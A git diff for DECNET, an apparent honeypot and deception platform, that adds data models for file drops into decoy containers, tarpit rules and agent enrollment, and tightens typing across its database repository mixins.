-188,6 +200,10 @@ class CanaryTokenCreateRequest(BaseModel): router so the 400 carries a clear detail message. """ decky_name: str = PydanticField(..., min_length=1) + # When set, ``decky_name`` is interpreted as a MazeNET topology decky + # name; the server validates membership and resolves the container + # accordingly. Absent ⇒ fleet semantics (today's behavior). + topology_id: Optional[str] = None kind: CanaryKind placement_path: str = PydanticField(..., min_length=1) blob_uuid: Optional[str] = None @@ -202,6 +218,7 @@ class CanaryTokenResponse(BaseModel): uuid: str kind: CanaryKind decky_name: str + topology_id: Optional[str] = None blob_uuid: Optional[str] instrumenter: Optional[str] generator: Optional[str] diff --git a/decnet/web/db/models/decky.py b/decnet/web/db/models/decky.py new file mode 100644 index 00000000..dfbc248c --- /dev/null +++ b/decnet/web/db/models/decky.py @@ -0,0 +1,130 @@ +"""DTOs for cross-cutting decky operations (file drops, etc.). + +These don't bind to a single table — fleet deckies and MazeNET +(topology) deckies share the request shape, with ``topology_id`` +discriminating. Following ``feedback_models_single_source`` we put +the request/response shapes alongside the rest of the API contracts +under ``decnet.web.db.models``. +""" +from __future__ import annotations + +from typing import Any, Optional + +from pydantic import BaseModel, Field as PydanticField, field_validator + + +class DeckyFileDropRequest(BaseModel): + """Drop arbitrary bytes at an absolute path inside a decky container. + + ``content_b64`` is the base64-encoded payload. Binary-safe. + + ``mode`` defaults to ``0o644`` (octal int). ``mtime_offset`` is a + seconds offset from now applied via ``touch -d`` so realistic-aged + files don't all stamp at wall-clock-now. + """ + decky_name: str = PydanticField(..., min_length=1) + topology_id: Optional[str] = None + path: str = PydanticField(..., min_length=1) + content_b64: str + mode: int = 0o644 + mtime_offset: int = 0 + + @field_validator("path") + @classmethod + def _abs_no_traversal(cls, v: str) -> str: + if not v.startswith("/"): + raise ValueError("path must be absolute (start with '/')") + # Defense in depth: even though we run as root inside the + # container, ``..`` segments make the on-disk location depend + # on the cwd at exec-time and surprise both operators and the + # auditor reading the placement_path field later. + for seg in v.split("/"): + if seg == "..": + raise ValueError("path must not contain '..' segments") + return v + + +class DeckyServiceAddRequest(BaseModel): + """Add a single service to an already-deployed decky. + + The service must be registered (see :mod:`decnet.services.registry`) + and must NOT be ``fleet_singleton`` — those run once fleet-wide, + not per-decky. Validation happens server-side in the engine layer + and surfaces as 422. + + ``config`` carries optional initial per-service config (same shape as + DeckyServiceConfigRequest.config) so the freshly-added container + comes up with the operator's env from the start, no follow-up Apply + needed. Empty dict = build with defaults. + """ + name: str = PydanticField(..., min_length=1) + config: dict[str, Any] = PydanticField(default_factory=dict) + + +class DeckyServicesResponse(BaseModel): + """Post-mutation services list, returned by the live add/remove API. + + Lets the dashboard reflect the new shape without a follow-up GET. + """ + decky_name: str + topology_id: Optional[str] = None + services: list[str] + + +class ServiceConfigFieldDTO(BaseModel): + """Serialized form of ``decnet.services.base.ServiceConfigField``. + + The Inspector form (Fleet + MazeNET) renders inputs from this metadata. + """ + key: str + label: str + type: str + default: Optional[Any] = None + secret: bool = False + help: Optional[str] = None + enum: Optional[list[str]] = None + placeholder: Optional[str] = None + + +class ServiceSchemaResponse(BaseModel): + """Per-service config schema returned by GET /services/{name}/schema.""" + name: str + ports: list[int] + fleet_singleton: bool = False + fields: list[ServiceConfigFieldDTO] = PydanticField(default_factory=list) + + +class DeckyServiceConfigRequest(BaseModel): + """Body for PUT/POST per-service config endpoints. + + The dict is validated against the service's ``config_schema`` + server-side: unknown keys are silently dropped, declared keys are + coerced to their declared type, and out-of-range values raise 400. + """ + config: dict[str, Any] = PydanticField(default_factory=dict) + + +class DeckyServiceConfigResponse(BaseModel): + """Post-validation config + apply state for the form to re-sync from.""" + decky_name: str + service_name: str + topology_id: Optional[str] = None + config: dict[str, Any] = PydanticField(default_factory=dict) + recreated: bool = False + + +class DeckyFileDeleteRequest(BaseModel): + """Best-effort ``rm -f`` of an absolute path inside a decky container.""" + decky_name: str = PydanticField(..., min_length=1) + topology_id: Optional[str] = None + path: str = PydanticField(..., min_length=1) + + @field_validator("path") + @classmethod + def _abs_no_traversal(cls, v: str) -> str: + if not v.startswith("/"): + raise ValueError("path must be absolute (start with '/')") + for seg in v.split("/"): + if seg == "..": + raise ValueError("path must not contain '..' segments") + return v diff --git a/decnet/web/db/models/swarm.py b/decnet/web/db/models/swarm.py index 68785952..1ab0dfa3 100644 --- a/decnet/web/db/models/swarm.py +++ b/decnet/web/db/models/swarm.py @@ -198,3 +198,34 @@ class SwarmHostHealth(BaseModel): class SwarmCheckResponse(BaseModel): results: list[SwarmHostHealth] + + +class EnrollBundleRequest(BaseModel): + master_host: str = PydanticField(..., min_length=1, max_length=253, + description="IP/host the agent will reach back to") + agent_name: str = PydanticField(..., pattern=r"^[a-z0-9][a-z0-9-]{0,62}$", + description="Worker name (DNS-label safe)") + with_updater: bool = PydanticField( + default=True, + description="Include updater cert bundle and auto-start decnet updater on the agent", + ) + use_ipvlan: bool = PydanticField( + default=False, + description=( + "Run deckies on this agent over IPvlan L2 instead of MACVLAN. " + "Required when the agent is a VirtualBox/VMware guest bridged over Wi-Fi — " + "Wi-Fi APs bind one MAC per station, so MACVLAN's extra container MACs " + "rotate the VM's DHCP lease. Safe no-op on wired/bare-metal hosts." + ), + ) + services_ini: Optional[str] = PydanticField( + default=None, + description="Optional INI text shipped to the agent as /etc/decnet/services.ini", + ) + + +class EnrollBundleResponse(BaseModel): + token: str + command: str + expires_at: datetime + host_uuid: str diff --git a/decnet/web/db/models/tarpit.py b/decnet/web/db/models/tarpit.py new file mode 100644 index 00000000..e43c214b --- /dev/null +++ b/decnet/web/db/models/tarpit.py @@ -0,0 +1,44 @@ +"""Tarpit rule table + HTTP request/response shapes.""" +from datetime import datetime, timezone +from typing import Any + +from pydantic import BaseModel, Field as PydanticField +from sqlmodel import Field, SQLModel + + +class TarpitRule(SQLModel, table=True): + """One active tarpit rule — one per decky at a time. + + ``ports`` is JSON-encoded (e.g. ``"[22, 80]"``). One row per decky; + ``set_tarpit_rule`` upserts on ``decky_name`` so re-enabling with + different parameters replaces the old rule. + """ + __tablename__ = "tarpit_rules" + + id: str = Field(primary_key=True) + decky_name: str = Field(index=True, unique=True) + ports: str # JSON list[int] + delay_ms: int + created_at: datetime = Field( + default_factory=lambda: datetime.now(timezone.utc) + ) + created_by: str # operator UUID from JWT + + +class TarpitEnableRequest(BaseModel): + ports: list[int] = PydanticField(..., min_length=1) + delay_ms: int = PydanticField(..., ge=100, le=300_000) + + +class TarpitRuleResponse(BaseModel): + id: str + decky_name: str + ports: list[int] + delay_ms: int + created_at: datetime + created_by: str + + +class TarpitStatusResponse(BaseModel): + rule: TarpitRuleResponse + active_connections: list[dict[str, Any]] diff --git a/decnet/web/db/models/topology.py b/decnet/web/db/models/topology.py index 8fae8f69..59825f74 100644 --- a/decnet/web/db/models/topology.py +++ b/decnet/web/db/models/topology.py @@ -1,14 +1,25 @@ """MazeNET topology tables + the REST DTOs that wrap them.""" +import json from datetime import datetime, timezone from typing import Annotated, Any, Literal, Optional from uuid import uuid4 from pydantic import BaseModel, BeforeValidator, ConfigDict, Field as PydanticField -from sqlalchemy import Column, Index, Text, UniqueConstraint +from sqlalchemy import Column, Index, String, Text, UniqueConstraint from sqlmodel import Field, SQLModel from ._base import _BIG_TEXT +_MUTATION_OPS = Literal[ + "add_lan", + "remove_lan", + "add_decky", + "attach_decky", + "detach_decky", + "remove_decky", + "update_decky", + "update_lan", +] # --- MazeNET tables --- # Nested deception topologies: an arbitrary-depth DAG of LANs connected by @@ -19,7 +30,9 @@ class Topology(SQLModel, table=True): __tablename__ = "topologies" id: str = Field(default_factory=lambda: str(uuid4()), primary_key=True) name: str = Field(index=True, unique=True) - mode: str = Field(default="unihost") # unihost|agent + mode: Literal["unihost", "agent"] = Field( + default="unihost", sa_column=Column("mode", String, nullable=False, default="unihost") + ) # When ``mode == "agent"``, pins this topology to a specific enrolled # worker. ``None`` for unihost topologies (master-local deploy). target_host_uuid: Optional[str] = Field( @@ -29,9 +42,12 @@ class Topology(SQLModel, table=True): config_snapshot: str = Field( sa_column=Column("config_snapshot", _BIG_TEXT, nullable=False, default="{}") ) - status: str = Field( - default="pending", index=True - ) # pending|deploying|active|degraded|failed|tearing_down|torn_down + status: Literal[ + "pending", "deploying", "active", "degraded", "failed", "tearing_down", "torn_down" + ] = Field( + default="pending", + sa_column=Column("status", String, nullable=False, default="pending", index=True), + ) status_changed_at: datetime = Field( default_factory=lambda: datetime.now(timezone.utc) ) @@ -101,10 +117,12 @@ class TopologyDecky(SQLModel, table=True): default=None, sa_column=Column("decky_config", _BIG_TEXT, nullable=True) ) ip: Optional[str] = Field(default=None) - # Same vocabulary as DeckyShard.state to keep dashboard rendering uniform. - state: str = Field( - default="pending", index=True - ) # pending|running|failed|torn_down|degraded|tearing_down|teardown_failed + state: Literal[ + "pending", "running", "failed", "torn_down", "degraded", "tearing_down", "teardown_failed" + ] = Field( + default="pending", + sa_column=Column("state", String, nullable=False, default="pending", index=True), + ) last_error: Optional[str] = Field( default=None, sa_column=Column("last_error", Text, nullable=True) ) @@ -168,15 +186,14 @@ class TopologyMutation(SQLModel, table=True): ) id: str = Field(default_factory=lambda: str(uuid4()), primary_key=True) topology_id: str = Field(foreign_key="topologies.id", index=True) - # add_lan|remove_lan|add_decky|attach_decky|detach_decky| - # remove_decky|update_decky|update_lan - op: str = Field(index=True) - # JSON-serialised op payload (keys depend on ``op``). + op: _MUTATION_OPS = Field(sa_column=Column("op", String, nullable=False, index=True)) payload: str = Field( sa_column=Column("payload", _BIG_TEXT, nullable=False, default="{}") ) - # pending|applying|applied|failed - state: str = Field(default="pending", index=True) + state: Literal["pending", "applying", "applied", "failed"] = Field( + default="pending", + sa_column=Column("state", String, nullable=False, default="pending", index=True), + ) requested_at: datetime = Field( default_factory=lambda: datetime.now(timezone.utc), index=True ) @@ -220,6 +237,8 @@ class TopologySummary(BaseModel): needs_resync: bool = False created_at: datetime status_changed_at: Optional[datetime] = None + email_personas: str = "[]" + language_default: str = "en" class TopologyListResponse(BaseModel): @@ -332,18 +351,6 @@ class EdgeCreateRequest(BaseModel): expected_version: Optional[int] = None -_MUTATION_OPS = Literal[ - "add_lan", - "remove_lan", - "add_decky", - "attach_decky", - "detach_decky", - "remove_decky", - "update_decky", - "update_lan", -] - - class MutationEnqueueRequest(BaseModel): op: _MUTATION_OPS payload: dict[str, Any] = PydanticField(default_factory=dict) @@ -353,8 +360,7 @@ class MutationEnqueueRequest(BaseModel): def _decode_json_payload(v: Any) -> Any: """Accept either a dict or a JSON-encoded string for mutation payloads.""" if isinstance(v, str): - import json as _json - return _json.loads(v) if v else {} + return json.loads(v) if v else {} return v @@ -365,7 +371,7 @@ class MutationRow(BaseModel): model_config = ConfigDict(extra="ignore") id: str topology_id: str - op: str + op: _MUTATION_OPS payload: _MutationPayload = PydanticField(default_factory=dict) state: str requested_at: datetime @@ -404,6 +410,12 @@ class NotEditableResponse(BaseModel): class ServiceCatalogResponse(BaseModel): services: list[str] + # Subset of ``services`` that run once fleet-wide (LLMNR, etc.) and + # therefore can't be added to a single decky. Per-decky add UIs + # filter these out so the operator never picks an option that the + # server would reject as 422. Empty when the registry has no + # singletons. + fleet_singletons: list[str] = PydanticField(default_factory=list) class ArchetypeEntry(BaseModel): diff --git a/decnet/web/db/repository.py b/decnet/web/db/repository.py index 140294b4..188cd5b1 100644 --- a/decnet/web/db/repository.py +++ b/decnet/web/db/repository.py @@ -1,6 +1,8 @@ from abc import ABC, abstractmethod from typing import Any, Optional +from decnet.web.db.models.topology import DeckyRow, EdgeRow, LANRow, TopologySummary + class BaseRepository(ABC): """Abstract base class for DECNET web dashboard data storage.""" @@ -724,7 +726,7 @@ class BaseRepository(ABC): async def create_topology(self, data: dict[str, Any]) -> str: raise NotImplementedError - async def get_topology(self, topology_id: str) -> Optional[dict[str, Any]]: + async def get_topology(self, topology_id: str) -> Optional[TopologySummary]: raise NotImplementedError async def list_topologies( @@ -732,7 +734,7 @@ class BaseRepository(ABC): status: Optional[str] = None, limit: Optional[int] = None, offset: Optional[int] = None, - ) -> list[dict[str, Any]]: + ) -> list[TopologySummary]: raise NotImplementedError async def count_topologies(self, status: Optional[str] = None) -> int: @@ -757,7 +759,7 @@ class BaseRepository(ABC): ) -> bool: raise NotImplementedError - async def list_topologies_needing_resync(self) -> list[dict[str, Any]]: + async def list_topologies_needing_resync(self) -> list[TopologySummary]: raise NotImplementedError async def add_lan( @@ -780,7 +782,7 @@ class BaseRepository(ABC): async def list_lans_for_topology( self, topology_id: str - ) -> list[dict[str, Any]]: + ) -> list[LANRow]: raise NotImplementedError async def add_topology_decky( @@ -803,7 +805,7 @@ class BaseRepository(ABC): async def list_topology_deckies( self, topology_id: str - ) -> list[dict[str, Any]]: + ) -> list[DeckyRow]: raise NotImplementedError async def add_topology_edge( @@ -816,7 +818,7 @@ class BaseRepository(ABC): async def list_topology_edges( self, topology_id: str - ) -> list[dict[str, Any]]: + ) -> list[EdgeRow]: raise NotImplementedError async def list_topology_status_events( @@ -827,17 +829,29 @@ class BaseRepository(ABC): # -------------------- pre-deploy (pending-only) mutations -------------------- async def delete_lan( - self, lan_id: str, *, expected_version: Optional[int] = None + self, + lan_id: str, + *, + expected_version: Optional[int] = None, + enforce_pending: bool = True, ) -> None: raise NotImplementedError async def delete_topology_decky( - self, decky_uuid: str, *, expected_version: Optional[int] = None + self, + decky_uuid: str, + *, + expected_version: Optional[int] = None, + enforce_pending: bool = True, ) -> None: raise NotImplementedError async def delete_topology_edge( - self, edge_id: str, *, expected_version: Optional[int] = None + self, + edge_id: str, + *, + expected_version: Optional[int] = None, + enforce_pending: bool = True, ) -> None: raise NotImplementedError @@ -976,6 +990,7 @@ class BaseRepository(ABC): decky_name: Optional[str] = None, state: Optional[str] = None, kind: Optional[str] = None, + topology_id: Optional[str] = None, ) -> list[dict[str, Any]]: raise NotImplementedError diff --git a/decnet/web/db/sqlmodel_repo/__init__.py b/decnet/web/db/sqlmodel_repo/__init__.py index 4bc87db6..df49a194 100644 --- a/decnet/web/db/sqlmodel_repo/__init__.py +++ b/decnet/web/db/sqlmodel_repo/__init__.py @@ -48,6 +48,7 @@ from decnet.web.db.sqlmodel_repo.orchestrator import OrchestratorMixin from decnet.web.db.sqlmodel_repo.realism import RealismMixin from decnet.web.db.sqlmodel_repo.swarm import SwarmMixin from decnet.web.db.sqlmodel_repo.topology import TopologyMixin +from decnet.web.db.sqlmodel_repo.tarpit import TarpitMixin from decnet.web.db.sqlmodel_repo.webhooks import WebhooksMixin @@ -66,6 +67,7 @@ class SQLModelRepository( OrchestratorMixin, RealismMixin, SwarmMixin, + TarpitMixin, TopologyMixin, WebhooksMixin, BaseRepository, diff --git a/decnet/web/db/sqlmodel_repo/_helpers.py b/decnet/web/db/sqlmodel_repo/_helpers.py index 8791dbd0..29b42727 100644 --- a/decnet/web/db/sqlmodel_repo/_helpers.py +++ b/decnet/web/db/sqlmodel_repo/_helpers.py @@ -12,14 +12,60 @@ from __future__ import annotations import asyncio import json +from abc import abstractmethod from contextlib import asynccontextmanager -from typing import Any +from typing import Any, Optional, TypeVar import orjson from sqlalchemy.ext.asyncio import AsyncSession, async_sessionmaker from decnet.logging import get_logger +T = TypeVar("T") + + +def _require(val: T | None, msg: str) -> T: + """Narrow ``X | None`` to ``X``, raising ``ValueError`` if None.""" + if val is None: + raise ValueError(msg) + return val + + +class _MixinBase: + """Typing base for all repo mixins. + + Declares the contract that ``SQLModelRepository`` satisfies at runtime + via MRO composition. Without this, mypy checks each mixin in isolation + and cannot see ``_session`` or cross-mixin helpers. + """ + + @abstractmethod + def _session(self): + """Return a cancellation-safe async session context manager.""" + raise NotImplementedError + + @staticmethod + def _deserialize_attacker(d: dict[str, Any]) -> dict[str, Any]: + """Stub — concrete impl on AttackersCoreMixin via MRO.""" + return d + + async def _assert_pending(self, session: AsyncSession, topology_id: str) -> None: + """Stub — concrete impl on TopologyCoreMixin via MRO.""" + raise NotImplementedError + + async def _check_and_bump_version( + self, + session: AsyncSession, + topology_id: str, + expected_version: Optional[int], + ) -> None: + """Stub — concrete impl on TopologyCoreMixin via MRO.""" + raise NotImplementedError + + async def list_running_topology_deckies(self) -> list[dict[str, Any]]: + """Stub — concrete impl on TopologyDeckiesMixin via MRO.""" + raise NotImplementedError + _log = get_logger("db.pool") # Hold strong refs to in-flight cleanup tasks so they aren't GC'd mid-run. @@ -66,7 +112,7 @@ def _detach_close(session: AsyncSession) -> None: task = loop.create_task(_cleanup()) _cleanup_tasks.add(task) # Consume any exception to silence "Task exception was never retrieved". - task.add_done_callback(lambda t: (_cleanup_tasks.discard(t), t.exception())) + task.add_done_callback(lambda t: (_cleanup_tasks.discard(t), t.exception())) # type: ignore[func-returns-value] @asynccontextmanager diff --git a/decnet/web/db/sqlmodel_repo/attacker_intel.py b/decnet/web/db/sqlmodel_repo/attacker_intel.py index 4b4ae9ad..a0cc6696 100644 --- a/decnet/web/db/sqlmodel_repo/attacker_intel.py +++ b/decnet/web/db/sqlmodel_repo/attacker_intel.py @@ -13,11 +13,14 @@ from datetime import datetime, timezone from typing import Any, Optional from sqlalchemy import desc, or_, select +from sqlmodel import col from decnet.web.db.models import Attacker, AttackerIntel -class AttackerIntelMixin: +from decnet.web.db.sqlmodel_repo._helpers import _MixinBase + +class AttackerIntelMixin(_MixinBase): """Mixin: methods composed onto ``SQLModelRepository``. Expects ``self._session()`` from the base. @@ -82,13 +85,13 @@ class AttackerIntelMixin: now = datetime.now(timezone.utc) async with self._session() as session: stmt = ( - select(Attacker.uuid, Attacker.ip) + select(col(Attacker.uuid), col(Attacker.ip)) .outerjoin( AttackerIntel, AttackerIntel.attacker_uuid == Attacker.uuid, ) .where( or_( - AttackerIntel.uuid.is_(None), + col(AttackerIntel.uuid).is_(None), AttackerIntel.expires_at < now, ) ) diff --git a/decnet/web/db/sqlmodel_repo/attackers/_core.py b/decnet/web/db/sqlmodel_repo/attackers/_core.py index a5240032..22e1739d 100644 --- a/decnet/web/db/sqlmodel_repo/attackers/_core.py +++ b/decnet/web/db/sqlmodel_repo/attackers/_core.py @@ -11,12 +11,15 @@ import json import uuid as _uuid from typing import Any, List, Optional -from sqlalchemy import desc, func, select +from sqlalchemy import desc, func, outerjoin, select +from sqlmodel import col -from decnet.web.db.models import Attacker +from decnet.web.db.models import Attacker, AttackerIntel -class AttackersCoreMixin: +from decnet.web.db.sqlmodel_repo._helpers import _MixinBase + +class AttackersCoreMixin(_MixinBase): @staticmethod def _deserialize_attacker(d: dict[str, Any]) -> dict[str, Any]: for key in ("services", "deckies", "fingerprints", "commands"): @@ -63,16 +66,16 @@ class AttackersCoreMixin: sort_by: str = "recent", service: Optional[str] = None, ) -> List[dict[str, Any]]: - order = { + order: Any = { "active": desc(Attacker.event_count), "traversals": desc(Attacker.is_traversal), }.get(sort_by, desc(Attacker.last_seen)) statement = select(Attacker).order_by(order).offset(offset).limit(limit) if search: - statement = statement.where(Attacker.ip.like(f"%{search}%")) + statement = statement.where(col(Attacker.ip).like(f"%{search}%")) if service: - statement = statement.where(Attacker.services.like(f'%"{service}"%')) + statement = statement.where(col(Attacker.services).like(f'%"{service}"%')) async with self._session() as session: result = await session.execute(statement) @@ -81,14 +84,49 @@ class AttackersCoreMixin: for a in result.scalars().all() ] + async def get_all_attackers_for_export(self) -> list[dict[str, Any]]: + """Return every attacker row left-joined with its intel row. + + Used exclusively by the export endpoint — no pagination, ordered by + last_seen desc so the file reads newest-first. + """ + stmt = ( + select(Attacker, AttackerIntel) + .select_from( + outerjoin(Attacker, AttackerIntel, Attacker.uuid == AttackerIntel.attacker_uuid) + ) + .order_by(desc(Attacker.last_seen)) + ) + async with self._session() as session: + rows = (await session.execute(stmt)).all() + + _intel_raw_keys = ("greynoise_raw", "abuseipdb_raw", "feodo_raw", "threatfox_raw") + result = [] + for attacker, intel in rows: + d = self._deserialize_attacker(attacker.model_dump(mode="json")) + if intel is not None: + intel_d = intel.model_dump(mode="json") + for key in _intel_raw_keys: + raw = intel_d.get(key) + if isinstance(raw, str): + try: + intel_d[key] = json.loads(raw) + except (json.JSONDecodeError, TypeError): + pass + d["threat_intel"] = intel_d + else: + d["threat_intel"] = None + result.append(d) + return result + async def get_total_attackers( self, search: Optional[str] = None, service: Optional[str] = None ) -> int: statement = select(func.count()).select_from(Attacker) if search: - statement = statement.where(Attacker.ip.like(f"%{search}%")) + statement = statement.where(col(Attacker.ip).like(f"%{search}%")) if service: - statement = statement.where(Attacker.services.like(f'%"{service}"%')) + statement = statement.where(col(Attacker.services).like(f'%"{service}"%')) async with self._session() as session: result = await session.execute(statement) diff --git a/decnet/web/db/sqlmodel_repo/attackers/activity.py b/decnet/web/db/sqlmodel_repo/attackers/activity.py index 60848fdb..328458ac 100644 --- a/decnet/web/db/sqlmodel_repo/attackers/activity.py +++ b/decnet/web/db/sqlmodel_repo/attackers/activity.py @@ -10,11 +10,14 @@ import json from typing import Any, Optional from sqlalchemy import desc, func, select +from sqlmodel import col from decnet.web.db.models import Attacker, Bounty, Log -class AttackerActivityMixin: +from decnet.web.db.sqlmodel_repo._helpers import _MixinBase + +class AttackerActivityMixin(_MixinBase): async def get_attacker_commands( self, uuid: str, @@ -24,7 +27,7 @@ class AttackerActivityMixin: ) -> dict[str, Any]: async with self._session() as session: result = await session.execute( - select(Attacker.commands).where(Attacker.uuid == uuid) + select(col(Attacker.commands)).where(Attacker.uuid == uuid) ) raw = result.scalar_one_or_none() if raw is None: @@ -52,13 +55,13 @@ class AttackerActivityMixin: """ async with self._session() as session: ip_res = await session.execute( - select(Attacker.ip).where(Attacker.uuid == attacker_uuid) + select(col(Attacker.ip)).where(Attacker.uuid == attacker_uuid) ) ip = ip_res.scalar_one_or_none() if not ip: return [] rows = await session.execute( - select(Log.service, Log.event_type) + select(col(Log.service), col(Log.event_type)) .where(Log.attacker_ip == ip) .distinct() ) @@ -75,7 +78,7 @@ class AttackerActivityMixin: rotation detection.""" async with self._session() as session: ip_res = await session.execute( - select(Attacker.ip).where(Attacker.uuid == attacker_uuid) + select(col(Attacker.ip)).where(Attacker.uuid == attacker_uuid) ) ip = ip_res.scalar_one_or_none() if not ip: @@ -104,7 +107,7 @@ class AttackerActivityMixin: """Cheap COUNT(*) for XFF-rotation detection.""" async with self._session() as session: ip_res = await session.execute( - select(Attacker.ip).where(Attacker.uuid == attacker_uuid) + select(col(Attacker.ip)).where(Attacker.uuid == attacker_uuid) ) ip = ip_res.scalar_one_or_none() if not ip: @@ -126,7 +129,7 @@ class AttackerActivityMixin: """ async with self._session() as session: ip_res = await session.execute( - select(Attacker.ip).where(Attacker.uuid == uuid) + select(col(Attacker.ip)).where(Attacker.uuid == uuid) ) ip = ip_res.scalar_one_or_none() if not ip: @@ -150,7 +153,7 @@ class AttackerActivityMixin: """ async with self._session() as session: ip_res = await session.execute( - select(Attacker.ip).where(Attacker.uuid == uuid) + select(col(Attacker.ip)).where(Attacker.uuid == uuid) ) ip = ip_res.scalar_one_or_none() if not ip: @@ -176,7 +179,7 @@ class AttackerActivityMixin: rows = await session.execute( select(Log) .where(Log.event_type == "session_recorded") - .where(Log.fields.contains(needle)) + .where(col(Log.fields).contains(needle)) .limit(1) ) row = rows.scalars().first() @@ -192,7 +195,7 @@ class AttackerActivityMixin: """ async with self._session() as session: ip_res = await session.execute( - select(Attacker.ip).where(Attacker.uuid == uuid) + select(col(Attacker.ip)).where(Attacker.uuid == uuid) ) ip = ip_res.scalar_one_or_none() if not ip: diff --git a/decnet/web/db/sqlmodel_repo/attackers/behavior.py b/decnet/web/db/sqlmodel_repo/attackers/behavior.py index c413557b..c8f8870b 100644 --- a/decnet/web/db/sqlmodel_repo/attackers/behavior.py +++ b/decnet/web/db/sqlmodel_repo/attackers/behavior.py @@ -7,11 +7,14 @@ from datetime import datetime, timezone from typing import Any, Optional from sqlalchemy import select +from sqlmodel import col from decnet.web.db.models import Attacker, AttackerBehavior -class AttackerBehaviorMixin: +from decnet.web.db.sqlmodel_repo._helpers import _MixinBase + +class AttackerBehaviorMixin(_MixinBase): async def upsert_attacker_behavior( self, attacker_uuid: str, @@ -56,9 +59,9 @@ class AttackerBehaviorMixin: return {} async with self._session() as session: result = await session.execute( - select(Attacker.ip, AttackerBehavior) + select(col(Attacker.ip), AttackerBehavior) .join(AttackerBehavior, Attacker.uuid == AttackerBehavior.attacker_uuid) - .where(Attacker.ip.in_(ips)) + .where(col(Attacker.ip).in_(ips)) ) out: dict[str, dict[str, Any]] = {} for ip, row in result.all(): diff --git a/decnet/web/db/sqlmodel_repo/attackers/sessions.py b/decnet/web/db/sqlmodel_repo/attackers/sessions.py index 2374bea5..07787ce6 100644 --- a/decnet/web/db/sqlmodel_repo/attackers/sessions.py +++ b/decnet/web/db/sqlmodel_repo/attackers/sessions.py @@ -9,7 +9,9 @@ from sqlalchemy import select from decnet.web.db.models import SessionProfile -class SessionProfilesMixin: +from decnet.web.db.sqlmodel_repo._helpers import _MixinBase + +class SessionProfilesMixin(_MixinBase): async def upsert_session_profile( self, sid: str, diff --git a/decnet/web/db/sqlmodel_repo/attackers/smtp.py b/decnet/web/db/sqlmodel_repo/attackers/smtp.py index a6e5a1ec..45b75c97 100644 --- a/decnet/web/db/sqlmodel_repo/attackers/smtp.py +++ b/decnet/web/db/sqlmodel_repo/attackers/smtp.py @@ -10,7 +10,9 @@ from sqlalchemy import desc, func, select from decnet.web.db.models import SmtpTarget -class SmtpTargetsMixin: +from decnet.web.db.sqlmodel_repo._helpers import _MixinBase + +class SmtpTargetsMixin(_MixinBase): async def increment_smtp_target(self, attacker_uuid: str, domain: str) -> None: """Upsert an (attacker_uuid, domain) pair and bump count + last_seen. diff --git a/decnet/web/db/sqlmodel_repo/auth.py b/decnet/web/db/sqlmodel_repo/auth.py index e322b5ea..63967c9b 100644 --- a/decnet/web/db/sqlmodel_repo/auth.py +++ b/decnet/web/db/sqlmodel_repo/auth.py @@ -8,7 +8,9 @@ from sqlalchemy import select, update from decnet.web.db.models import User -class AuthMixin: +from decnet.web.db.sqlmodel_repo._helpers import _MixinBase + +class AuthMixin(_MixinBase): """Mixin: composed onto ``SQLModelRepository``. Expects ``self._session()``. ``_ensure_admin_user`` stays in the package ``__init__`` so the diff --git a/decnet/web/db/sqlmodel_repo/bounties.py b/decnet/web/db/sqlmodel_repo/bounties.py index 00c3880d..94c7ac56 100644 --- a/decnet/web/db/sqlmodel_repo/bounties.py +++ b/decnet/web/db/sqlmodel_repo/bounties.py @@ -7,12 +7,15 @@ from typing import Any, List, Optional import orjson from sqlalchemy import asc, desc, func, or_, select, text +from sqlmodel import col from sqlmodel.sql.expression import SelectOfScalar from decnet.web.db.models import Bounty -class BountiesMixin: +from decnet.web.db.sqlmodel_repo._helpers import _MixinBase + +class BountiesMixin(_MixinBase): """Mixin: composed onto ``SQLModelRepository``.""" async def purge_logs_and_bounties(self) -> dict[str, int]: @@ -40,7 +43,7 @@ class BountiesMixin: async with self._session() as session: dup = await session.execute( - select(Bounty.id).where( + select(col(Bounty.id)).where( Bounty.bounty_type == data.get("bounty_type"), Bounty.attacker_ip == data.get("attacker_ip"), Bounty.payload == data.get("payload"), @@ -63,10 +66,10 @@ class BountiesMixin: lk = f"%{search}%" statement = statement.where( or_( - Bounty.decky.like(lk), - Bounty.service.like(lk), - Bounty.attacker_ip.like(lk), - Bounty.payload.like(lk), + col(Bounty.decky).like(lk), + col(Bounty.service).like(lk), + col(Bounty.attacker_ip).like(lk), + col(Bounty.payload).like(lk), ) ) return statement @@ -126,7 +129,7 @@ class BountiesMixin: async def get_bounties_for_ips(self, ips: set[str]) -> dict[str, List[dict[str, Any]]]: async with self._session() as session: result = await session.execute( - select(Bounty).where(Bounty.attacker_ip.in_(ips)).order_by(asc(Bounty.timestamp)) + select(Bounty).where(col(Bounty.attacker_ip).in_(ips)).order_by(asc(Bounty.timestamp)) ) grouped: dict[str, List[dict[str, Any]]] = defaultdict(list) for item in result.scalars().all(): @@ -137,3 +140,15 @@ class BountiesMixin: pass grouped[item.attacker_ip].append(d) return dict(grouped) + + async def count_probe_relays(self, attacker_ip: str, decky: str) -> int: + """Return how many probe_relay bounties exist for this (attacker_ip, decky) pair.""" + async with self._session() as session: + result = await session.execute( + select(func.count()).select_from(Bounty).where( + Bounty.attacker_ip == attacker_ip, + Bounty.decky == decky, + Bounty.bounty_type == "probe_relay", + ) + ) + return result.scalar() or 0 diff --git a/decnet/web/db/sqlmodel_repo/campaigns.py b/decnet/web/db/sqlmodel_repo/campaigns.py index 9c9b10ff..fe87bf2a 100644 --- a/decnet/web/db/sqlmodel_repo/campaigns.py +++ b/decnet/web/db/sqlmodel_repo/campaigns.py @@ -11,11 +11,14 @@ from datetime import datetime, timezone from typing import Any, Optional from sqlalchemy import desc, func, select, update +from sqlmodel import col from decnet.web.db.models import AttackerIdentity, Campaign -class CampaignsMixin: +from decnet.web.db.sqlmodel_repo._helpers import _MixinBase + +class CampaignsMixin(_MixinBase): """Mixin: composed onto ``SQLModelRepository``.""" async def get_campaign_by_uuid(self, uuid: str) -> Optional[dict[str, Any]]: @@ -41,7 +44,7 @@ class CampaignsMixin: ) -> list[dict[str, Any]]: statement = ( select(Campaign) - .where(Campaign.merged_into_uuid.is_(None)) + .where(col(Campaign.merged_into_uuid).is_(None)) .order_by(desc(Campaign.updated_at)) .offset(offset) .limit(limit) @@ -54,7 +57,7 @@ class CampaignsMixin: statement = ( select(func.count()) .select_from(Campaign) - .where(Campaign.merged_into_uuid.is_(None)) + .where(col(Campaign.merged_into_uuid).is_(None)) ) async with self._session() as session: result = await session.execute(statement) @@ -91,7 +94,7 @@ class CampaignsMixin: # graph reads. Narrow on purpose — future denormalised # projections (commands_by_phase from log mining, decky-set # 